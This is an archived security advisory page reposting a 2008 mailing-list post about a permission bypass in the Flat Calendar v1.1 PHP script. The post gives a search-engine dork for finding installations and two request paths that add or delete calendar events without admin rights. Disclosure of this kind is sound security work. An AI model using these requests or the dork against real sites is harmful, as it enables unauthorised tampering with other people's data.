Computer Security

Security Advisory: Flat Calendar v1.1 Remote Permission Bypass Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Exploit for vBulletin "obscure" XSS (3.7.1 & 3.6.10)

  Pooya Site Builder (PSB) SQL Injection Vulnerabilities

  ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability

  phpRaider  <= v1.0.6,7 Maybe Other Versions Remote File include Vulnerable

From:laurent gaffié <none_(at)_none.com>
Date:14.06.2008
Subject:Flat Calendar v1.1 Remote Permission Bypass Vulnerability

Flat Calendar v1.1  Remote Permission Bypass Vulnerability

Author : Crackers_Child

Dork   : Flat Calendar: View All > Flat Calendar: View All iзin yaklaşık 654.000 sonuзtan


Exploits:

site.com/calender_path/admin/add.php > Adding New Evetns without admin permissions.

site.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] > Deleting Events without admin
permissions.
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru